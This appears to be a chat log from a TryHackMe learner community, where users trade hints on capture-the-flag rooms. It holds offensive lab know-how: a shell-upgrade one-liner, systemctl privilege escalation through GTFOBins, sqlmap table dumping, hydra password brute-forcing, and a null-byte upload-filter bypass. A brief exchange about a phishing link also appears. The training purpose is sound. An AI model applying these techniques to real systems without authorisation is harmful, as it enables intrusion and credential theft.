They got overloaded and didn't manage to give all the tickets unfortunately, I didn't get mine either

Kinda feelsbadman but oh well

It was fun making a blog post regardless

anyone knows what happed to 403 fuzzer ?

I'm doing https://tryhackme.com/room/chillhack and have established a reverse shell with awk. But now I'm stuck. Could someone give me a hint on what to do next?

Where you stuck at? Please be specific.

I am so lost. Cannot figure out the answer:

https://tryhackme.com/room/mitre

Where can you find step-by-step instructions to execute both scenarios?

6 & 7 Letters.

From my point of view, the answer would be github but i am not sure what the second word would be.

Which Task and which question?

Found the Answer, barried in the deep web. I would recommend to implement a Hint for this one.

Task6, Last Question

a little help pls , i am trying to determine when will the crontab on the deployed instance will run on this machine , i am entering the answer 5 am on Monday but its not accepting

the values are 0 5 * * * 1 which means 5 am on Monday

0 5 * * 1

Look at last line..

oh so i am supposed to look into that file thanks

Nope.

What you are looking is on the Last line itself.

where is it ?

i went to the directory and their was no such process as processes.sh

instead tryhackme.sh

i opened it and revealed a gflag

flag

but nothing else

It starts with @

what does that means ?

i want the time of that

Question is simply asking you that when will the cronjob normally run on the deployed instance.

is that a username

yes and then the narrator opened the crontab using crontab -e

but he has a different question for him

You will see something like this - @ followed by r....

wel yes thats the answer but it was so confusing , i thought it was asking about the time and not the process

it should have asked at what stage will it run

it felt like it was inquiring about the time

Well, if in future you get stuck on a particular question then your best bet would be to carefully see the Answer tolerance of THM and then try to guess what will be the answer.

You should start thinking out of the box too. Will be helpful a lot.

it was asking "when" so i immediately opened the crontab generator website to verify the time . i thopught it was the time it was after so i kept looking for the time , which says 5 am on Monday

but through the answer it seems like it was talking about the stage of the process

what is a repository ?

It can be confusing at starting but now you know. Thinking about every other possibilities is a good thing.

@spice shard what happens when a software developer wishes to submit a software he created ? does it goes into the /etc/apt directory ?

is that it ? and everyone would be able to see it ?

Everyone can see your submitted package if it gets approved.

but where is it submitted ?

within the apt folder ?

and its done ?

everyone will able to see that ?

no uploads on any website ?

Dunno where to submit but you can research on google and all your questions.

ohk thanks

Hiya, at the last task of https://tryhackme.com/room/ccpentesting and stuck on privilege escalation. connected as a normal user and moved ssh into a meterpreter session. got 3 possible exploits in metasploit, but none will work.. Kinda stuck at finding more

anyone can push me out of my boxthinking 😉

@simple mountain ^

It's almost in every channel.

Login with Steam? This doesn't seem legit...

I mean ESPECIALLY here I'm not clicking any links... :)))

I jest. But does that happen often?

Me neither. I'm just copying and opening it on a throwaway server

I've never seen phishing here before

Hmmm. Interesting move then.

Did he just...delete his message!?

Mods, yes

Good mod 🙂

Nice

Is it some kind of cookie stealing phishing?

I have no clue. But sounds bad......

yeah man

Sus

does anyone know if 'Holo' is working?

because it seems like the web page is down

You can ask this in #holo-network ..

Can i get hint for Crocc Crew?

#875816262234673152 :)

really thnx i didnt realize that 😄

guys i'm doing the vulvuniversity room, but i can't do the privilege escalation

i should use systemctl but is my first time and i don't know how to use

i will suggest gtfobins

https://gtfobins.github.io/gtfobins/systemctl/

thanks bro

Gave +1 Rep to @heady tiger

I can not make it, everythings i try to do responde me: no tty present and no askpass program specified

i need to change the password, and for do that i need to make a privilage escalation with systemctl, but i can't make it

python -c 'import pty;pty.spawn("/bin/bash")

Have you got your tty shell?

I don't know what Is this

I can not make it, everythings i try to do responde me: no tty present and no askpass program specified

Here you are talking about the non-functional or unstable shell with no job controls, no auto complete, no clearing screen with clear command, etc. That's where you have to improve your shell.

Ok, for example with metasploitable i can get a functional Shell, right?

Hi. I am doing the NSE Scripts: Working with the NSE, I am need a hint for the following Answer the questions below
What optional argument can the ftp-anon.nse script take?

Answer format: *******

Metasploitable or metasploit?

You can find it here https://nmap.org/nsedoc/scripts/ftp-anon.html

@spice shard metasploit

Sorry my phone have autocompleted the Word

See if you get a shell with netcat (let's take simple example), then you would probably have under-privilege shell ( non-functional, no auto complete, no jobs control, no clearing screen, get's exited due to pressing CTRL + C, etc ). Now, here you need to improve this shell in order to get a fully functional shell. And there are some commands using which you can achieve this.

But if you think of metasploit, which has many modules and different type of payloads to get different shell, for eg, meterpreter shell, unix shell, etc. If you consider a case where you have a unix shell (in metasploit) and you need to get the terminal first (or maybe it is not necessary, as per the need basically), or you can start a new listener on another terminal and using one-liner bash shell command, you can catch the connection on that listener and there you need to improve the shell again to make it fully functional.

I personally use pwncat from https://github.com/calebstewart/pwncat

Ohh thanks very much, infloop. I will have a look at it.

Realy thank u man, good explanation

Gave +1 Rep to @spice shard

its also takin long for me im on 612 😩

Im doing linux fundamentals part 3
It said me to start machine and then click on attack box , i did the same

Then its saying to use some credentials to login .....from where I can login , no option is showing in machine..

Coming in next tast : its saying edit task3 located in tryhackme's home directory using nano..

I cant see where is nano , i cant see where is home directory

I think i have deployed machine wrong

How to deploy machine in a right way -_-

Task 2 says deploy machine. And nano is a text editor. Have you read the tasks?

You need to login via ssh and you are given the credentials on Task2 itself. As for the nano, it is a text editor and you can open it using nano command.

Hey peoples. Im currently trying to dump some SQL table for the CC Pentest - Task 18.
Im using ||sqlmap <ip> --forms --dump|| leaving the POST data be filled with random values. With this outcome:

The info in the feed shows a flag column, but the table visualization is showing <blank>

Any tips on what may be the problem?

hello, im on the" simple ctf" i found t ||CMS Made Simple < 2.2.10 - SQL Injection, when i try to execute the script python (with the url to /simple) i have an "ImportError: No module named termcolor" while pip tell me "Requirment already satisfied"||

Are you running the exploit with python2 ?

i running with python, python2, python3 it's the same

Termcolor module error with python3 also?

Yep same happened to me also when dealing with term colour... Idk what to do and left it

You can convert the exploit to python3. It should be in python2 afaik

how convert to python3 it's easy ?

There should be some online tool to do that for you if you don't have the time and need a quick workaround

Here is one, one of many results from the web search
https://pythonconverter.com/

You only need to wrap every print statement with parenthesis (:

That's it.

Yeah, that is basically it for simple scripts😂

thanks you i will try both

just an fyi, i ran that room a few days ago. converting to python3 didn't help me solve it

i'd also be interested in the solution if you've found it @high spire

ok

^^

i try some things but now i have no error

@oblique plank

so you execute this and it works? No errors?

yes with python3 no error

nice!

yes

what wordlists you use ?

|||I believe rockyou.txt|| I'm sure you could use a smaller wordlists

yes it's a bit long

@oblique plank you have no problem with this script?, me i had to change "TIME = 2"

Anyone able to help me out? I'm doing "Network Services" (machine polosmb3) and it says "do any nmap scan you like, how many ports are open'. What machine though? Is it my own?

I might have my machines mixed up again but I'd like to know for clarity's sake.

No not your own machine (attackbox or VM), the machine you are able to start in task 3 for example

Hmmm, I started the machine in task 3 like 3 times, but it just gives me the attackbox. Maybe I should try turning it off and on again.

But thanks! I'll make sure that's the case.

Mh, if I start the machine in task 3 it's only starting the target machine like so:

I have that as well.

And I tried restarting the machines multiple times but I still only get the standard attackbox

It's just done loading, gonna try again.

Ah

There we go!

Well I think we are somehow misunderstanding. If you press the "Start machine" button, it should only start the target machine like in the picture above. If you press the "Start Attackbox" button on top of the page, it's starting the attackbox. So if you have the target started and if you have your attackbox started then everything is fine. Then you have to use your attackbox to conduct an nmap scan on the target machine (10.10.166.66)

Hmmm, last time I tried the target IP and it gave me a weird result, so might be both I misread the IP and the interface of these boxes is still some getting used to.

It worked after a reset so I guess it had something to do with me starting the wrong machine (again).

Thanks!

Ye, mixing up the target IP and you attackbox IP is very common that happened to many people, including myself 😄 But if you are stuck for quite some time just because of that, you won't mix them up again 😄 Sure no problem.

Lmao I'll get there. Most of the time when I get stuck on assignments it's because I'm reading numbers wrong or doing some other frickery with the VMs.

Curious if someone could take a quick look at a screen shot from Mr Robot to see if there's something messed up with my command? I was able to utilize one utility to find a password but I was initially trying a different and it wasn't working. If it's ok to paste here I will but I didn't want to spoil anything for anyone

you can paste here

you can mark it as a spoiler

||spoiler||

Ok will do when I get back home. Thanks.

you need to verify to post screenshots

!docs verify

||OK, so hydra worked to find the username, but would not work for the password. WPSCAN worked for the password but I was trying to figure out why my hydra wasn't working||

There sorry the first message only marked the screen shot as spoiler

what room is this?

MrRobot

What password list are you using?

initially I was using the one found on the box which contains the correct password. I created a temporary list with the correct password just to test out why the one tool wasn't working right

so you have checked ||robots.txt|| correct?

yup, that's where I got my password list

Okay just confirming so I didn't spoil anything

I've finished the box, I just cant figure out why that one step, the one tool doesn't work right

ah okay, maybe try recopying the response with burp

ive had issues with that before with hydra

id also take away -t

ive had it skip the right password before when I tried to push it too hard id say max is probably 16 that I would do personally

let me spin it back up and see

So I pulled a new ||fsocity.dic|| and trimmed duplicates, got a new burp request, set up the attack again without the -t still doesn't work. I really think something is wrong with my command for some reason, I'm think it's something to do with the 3rd string telling it what to look for

if in the error message it has the word incorrect just change it to that

instead of that long string at the end, could be looking for exact string and its messing up there but if it only has to look for the word incorrect it could be more reliable

nope, that doesn't work either.. meh so frustrating. Might just have to proxy ||hydra|| and review all the requests and responses to see what's going on

I need a hint on Boiler CTF stuck on question "
Keep enumerating, you'll know when you find it."

Hey everybody. I recently solved Super-Spam and there is one nagging question I have on what might have been an alternate path. ||Has anyone figured out if its possible to decode the 802.11 frames in SamsNetwork.cap in wireshark using the wifi password recovered using aircrack-ng? I tried using the 'Protocol Preferences' to set the decryption key (using wpa-pwd), but it didn't work. ||

@jaunty geyser did you solve the problem with the payload I have the same issue

Room:Upload Vulnerabilities
Task: Challenge
The custom wordlist contains characters from AAA to ZZZ, I know we've to use it w gobuster but what exactly does it do?

Anyone who has solved the Metasploit (https://tryhackme.com/room/rpmetasploit) task 6 and beyond, kindly help... The ps command is not revealing anything related to spool, on both the exploit machine console or in the usual msf6 console... I understand that the room is using msf4-5, but is there a drastic difference? I searched the net but found a completely answered walkthrough, which I don't want. I want guidance on this, please help by DM. I have successfully finished all the previous tasks.

Yeah

Is this a known bug in retro? It will not let me select anything in order to proceed

ps|grep spool

try that :o

I think I used msf5 but I don't know if that changes anything

"ps" was showing 5 processes and none were spool XD T_T

hmmm

lemme try and replicate it 🤔

You can open this verisign certificate in IE browser..

@spice shard the problem is it wouldn't let me, apparently it's a known bug you have to initialize IE and Chrome before trying which I hadn't done. Restarting the machine didn't fix it either so I just got system a different way

Uhh.. Err.. Dunno, but it's good you got it. (:

Which Task and which question?

@jaunty geyser can I dm please I'm stuck

sure boss, reply to me in pvt so we can discuss w/o spoilers for others 🙂

SHooT

Hi guys! Please tell me if there should be a mssql server in the ustoun room?

Hey everyone, quick question regarding attacktive directory room by spooky - task 5. I get an error message when trying to request a TGT from Kerberos by using Impackets GetNPUsers.py. It says "service not known" - even though I entered the same as in the writeups - where did I made a mistake?

please share some screenshots of what's happening if you can 🙂

Hello, I want to know more about the Null Byte poisoning thing employed in the OWASP Juice Room... %00 is the null byte, %25 is '%' in ascii... what is the %2500... is it becoming "package.json.bak%00.md"... but then how is it downloading, there is no file that matches with the required "package.json.bak.md"... Can somebody please DM if it requires lot of discussion?

I'm also interested in an explanation to this 👆

There is a file named package.json.bak which can not be downloaded because we are only allowed to download pdf and md.
So we insert a null character. Since we are inserting it in url we use its unicode which is%00. Aftet url encoding it becomes%2500 (%25 for the % and 00 remains same).
We insert it at the end of the file name and add md extension which we allowed to download.
Think of null byte as commenting out with # or -- in sqli

The null byte acts as a string termination character, meaning that the parser interprets the %00 as the end of the string

Ok wtf was that autocorrect?

Hello anyone has solved the Uranium CTF ?

Hi, i have a question for the tmuxremux room, somebody up with a hint?

How can you run the desired plugin after loading it?

#878357239864389732

@obtuse gust

Oh... Thx!! 👍👌

What is a Privilege Escalation Checklist? I mean I've looked it up on Google but I still don't get it 😅

Is it like a checklist of ALL Privilege Escalation tools?

Well not sure what checklist you looked up, but overall I would say it is a list that contains hints on what to look for when trying to escalate privileges. For example, wrongly set permissions on certain files. Outdated programs that lead to a privilege escalation etc.

Alright basically it consists in choosing the right method to exploit something to escalate privileges

I get it

A privesc checklist is just a list of things to check for to try and find privesc methods

The idea is that it provides a methodical set of items to work through in order

Alright thanks man

@ripe hedge what's the smallest hint you can give me : ))) like absolute minimum. I think I need a push in the right direction

Wait hold on

I made some progress

Will poke you if I'm stuck again

Nevermind, that wasn't it : ((

I can't find anything and I feel like I'm gonna stay stuck. I'm absolutely sure I'm looking in the wrong direction. I'm going to bed now but I'll try again fresh tomorrow!

Nmap gives a bit of a hint

There's something exposed that shouldn't be

I did find that yesterday, but gotta figure out what to do with it

Thanks! Now I know that was the right direction.

Gave +1 Rep to @ripe hedge

Good hunting

Anyone can give me a push in the right direction on task 8 of "Upload Vulnerabilities"?

trying to find the upload dir, but havent succeeded till now...

So you are just having issues to find where the files get stored, not with finding or using the site to upload the files, right?

I seem to have uploaded the reverse shell, but the upload dir is not findable by gobuster... so there is where i got stuck

also been scanning throught the js and css but cant find a path there either till now

try dirb

Or let me know what folders you have found, then I can let you know if the right one is within one of your results (not spoiling you which one it would be)

only folders i found are assets, privacy and server-status till now. I can browse the assets folder. rest is 403

the task specically tell that the dir is randomised

Well, then one of them is the right one already.

ah crap. you are right 🙂

😄

got the flag... just saw the 403 and gave up on the dir without checking

thanks @left thunder

Gave +1 Rep to @left thunder

No problem